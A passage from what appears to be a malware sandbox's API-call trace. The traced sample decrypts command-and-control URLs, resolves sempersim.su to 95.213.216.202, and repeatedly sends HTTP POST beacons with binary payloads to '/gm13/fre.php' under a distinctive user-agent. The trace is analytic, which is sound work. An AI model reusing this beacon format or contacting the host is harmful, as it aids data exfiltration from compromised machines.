0x620000 [0134.488] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0134.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0134.489] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6432d8, pdwDataLen=0x19fcfc | out: pbData=0x6432d8, pdwDataLen=0x19fcfc) returned 1 [0134.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0134.490] CryptDestroyKey (hKey=0x62d190) returned 1 [0134.490] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0134.491] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0134.491] GetProcessHeap () returned 0x620000 [0134.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0134.491] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0134.492] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0134.492] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0134.493] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0134.493] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0134.494] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0134.494] GetProcessHeap () returned 0x620000 [0134.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0134.494] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c398*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ec28*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0134.495] GetProcessHeap () returned 0x620000 [0134.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b5d0 [0134.495] socket (af=2, type=1, protocol=6) returned 0x2d4 [0134.498] connect (s=0x2d4, name=0x63ec28*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0134.548] FreeAddrInfoW (pAddrInfo=0x63c398*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ec28*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0134.548] GetProcessHeap () returned 0x620000 [0134.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63bcb0 [0134.548] GetProcessHeap () returned 0x620000 [0134.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0134.549] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0134.550] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0134.550] GetProcessHeap () returned 0x620000 [0134.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0134.550] GetProcessHeap () returned 0x620000 [0134.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0134.550] GetProcessHeap () returned 0x620000 [0134.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x642ee8 [0134.550] GetProcessHeap () returned 0x620000 [0134.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0134.551] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0134.552] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0134.552] GetProcessHeap () returned 0x620000 [0134.552] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0134.552] GetProcessHeap () returned 0x620000 [0134.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0134.552] send (s=0x2d4, buf=0x63a880*, len=237, flags=0) returned 237 [0134.553] send (s=0x2d4, buf=0x6421e0*, len=159, flags=0) returned 159 [0134.553] GetProcessHeap () returned 0x620000 [0134.553] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0134.553] recv (in: s=0x2d4, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0136.258] GetProcessHeap () returned 0x620000 [0136.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0136.259] GetProcessHeap () returned 0x620000 [0136.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642ee8 | out: hHeap=0x620000) returned 1 [0136.259] GetProcessHeap () returned 0x620000 [0136.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0136.259] GetProcessHeap () returned 0x620000 [0136.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63bcb0 | out: hHeap=0x620000) returned 1 [0136.259] closesocket (s=0x2d4) returned 0 [0136.260] GetProcessHeap () returned 0x620000 [0136.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b5d0 | out: hHeap=0x620000) returned 1 [0136.260] GetProcessHeap () returned 0x620000 [0136.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0136.261] GetProcessHeap () returned 0x620000 [0136.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6432d8 | out: hHeap=0x620000) returned 1 [0136.261] GetProcessHeap () returned 0x620000 [0136.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0136.261] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x56c) returned 0x2d4 [0136.263] Sleep (dwMilliseconds=0xea60) [0136.276] GetProcessHeap () returned 0x620000 [0136.276] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643128 [0136.277] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0136.277] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0136.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0136.285] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0136.294] GetProcessHeap () returned 0x620000 [0136.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0136.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0136.295] CryptImportKey (in: hProv=0x63bcb0, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0136.296] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0136.297] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0136.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0136.297] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0136.297] GetProcessHeap () returned 0x620000 [0136.298] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0136.299] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0136.299] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643128, pdwDataLen=0x19fcfc | out: pbData=0x643128, pdwDataLen=0x19fcfc) returned 1 [0136.300] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0136.300] CryptDestroyKey (hKey=0x62d710) returned 1 [0136.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0136.301] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0136.301] GetProcessHeap () returned 0x620000 [0136.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0136.302] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0136.302] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0136.303] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0136.303] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0136.304] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0136.304] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0136.305] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0136.305] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0136.305] GetProcessHeap () returned 0x620000 [0136.305] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0136.305] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0136.305] GetProcessHeap () returned 0x620000 [0136.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0136.306] GetProcessHeap () returned 0x620000 [0136.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0136.307] GetProcessHeap () returned 0x620000 [0136.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643128 | out: hHeap=0x620000) returned 1 [0136.308] GetProcessHeap () returned 0x620000 [0136.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643128 [0136.311] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0136.311] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0136.317] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0136.318] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0136.326] GetProcessHeap () returned 0x620000 [0136.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638fd8 [0136.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0136.328] CryptImportKey (in: hProv=0x63ba08, pbData=0x638fd8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0136.328] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0136.329] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0136.329] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0136.330] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0136.330] GetProcessHeap () returned 0x620000 [0136.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fd8 | out: hHeap=0x620000) returned 1 [0136.331] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0136.331] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643128, pdwDataLen=0x19fcfc | out: pbData=0x643128, pdwDataLen=0x19fcfc) returned 1 [0136.332] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0136.332] CryptDestroyKey (hKey=0x62d710) returned 1 [0136.332] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0136.333] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0136.333] GetProcessHeap () returned 0x620000 [0136.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0136.334] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0136.334] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0136.334] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0136.335] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0136.335] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0136.336] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0136.336] GetProcessHeap () returned 0x620000 [0136.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0136.336] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c258*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ebf8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0136.337] GetProcessHeap () returned 0x620000 [0136.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b580 [0136.337] socket (af=2, type=1, protocol=6) returned 0x2d8 [0136.338] connect (s=0x2d8, name=0x63ebf8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0136.388] FreeAddrInfoW (pAddrInfo=0x63c258*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ebf8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0136.388] GetProcessHeap () returned 0x620000 [0136.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba08 [0136.388] GetProcessHeap () returned 0x620000 [0136.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0136.389] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0136.389] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0136.389] GetProcessHeap () returned 0x620000 [0136.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0136.390] GetProcessHeap () returned 0x620000 [0136.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0136.391] GetProcessHeap () returned 0x620000 [0136.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643098 [0136.391] GetProcessHeap () returned 0x620000 [0136.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0136.391] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0136.392] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0136.392] GetProcessHeap () returned 0x620000 [0136.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0136.392] GetProcessHeap () returned 0x620000 [0136.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0136.393] send (s=0x2d8, buf=0x63a880*, len=237, flags=0) returned 237 [0136.393] send (s=0x2d8, buf=0x6421e0*, len=159, flags=0) returned 159 [0136.393] GetProcessHeap () returned 0x620000 [0136.393] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0136.393] recv (in: s=0x2d8, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0138.102] GetProcessHeap () returned 0x620000 [0138.102] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0138.102] GetProcessHeap () returned 0x620000 [0138.102] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643098 | out: hHeap=0x620000) returned 1 [0138.102] GetProcessHeap () returned 0x620000 [0138.103] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0138.103] GetProcessHeap () returned 0x620000 [0138.103] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba08 | out: hHeap=0x620000) returned 1 [0138.103] closesocket (s=0x2d8) returned 0 [0138.104] GetProcessHeap () returned 0x620000 [0138.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b580 | out: hHeap=0x620000) returned 1 [0138.104] GetProcessHeap () returned 0x620000 [0138.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0138.104] GetProcessHeap () returned 0x620000 [0138.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643128 | out: hHeap=0x620000) returned 1 [0138.104] GetProcessHeap () returned 0x620000 [0138.105] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0138.105] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x540) returned 0x2d8 [0138.106] Sleep (dwMilliseconds=0xea60) [0138.120] GetProcessHeap () returned 0x620000 [0138.120] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642d80 [0138.120] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0138.121] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0138.127] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0138.127] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0138.134] GetProcessHeap () returned 0x620000 [0138.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638fd8 [0138.134] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0138.135] CryptImportKey (in: hProv=0x63b7e8, pbData=0x638fd8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0138.136] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0138.140] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0138.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0138.141] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0138.141] GetProcessHeap () returned 0x620000 [0138.141] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fd8 | out: hHeap=0x620000) returned 1 [0138.142] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0138.142] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642d80, pdwDataLen=0x19fcfc | out: pbData=0x642d80, pdwDataLen=0x19fcfc) returned 1 [0138.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0138.143] CryptDestroyKey (hKey=0x62d190) returned 1 [0138.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0138.144] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0138.144] GetProcessHeap () returned 0x620000 [0138.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0138.144] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0138.145] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0138.145] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0138.145] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0138.146] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0138.146] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0138.147] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0138.147] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0138.147] GetProcessHeap () returned 0x620000 [0138.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0138.147] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0138.147] GetProcessHeap () returned 0x620000 [0138.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0138.148] GetProcessHeap () returned 0x620000 [0138.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0138.148] GetProcessHeap () returned 0x620000 [0138.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642d80 | out: hHeap=0x620000) returned 1 [0138.148] GetProcessHeap () returned 0x620000 [0138.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643368 [0138.152] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0138.153] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0138.157] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0138.158] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0138.163] GetProcessHeap () returned 0x620000 [0138.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0138.163] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0138.164] CryptImportKey (in: hProv=0x63b7e8, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0138.164] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0138.164] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0138.165] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0138.165] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0138.165] GetProcessHeap () returned 0x620000 [0138.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0138.168] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0138.169] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643368, pdwDataLen=0x19fcfc | out: pbData=0x643368, pdwDataLen=0x19fcfc) returned 1 [0138.169] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0138.169] CryptDestroyKey (hKey=0x62d190) returned 1 [0138.170] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0138.170] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0138.170] GetProcessHeap () returned 0x620000 [0138.170] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0138.171] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0138.171] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0138.172] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0138.172] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0138.172] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0138.173] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0138.173] GetProcessHeap () returned 0x620000 [0138.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633318 [0138.173] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | 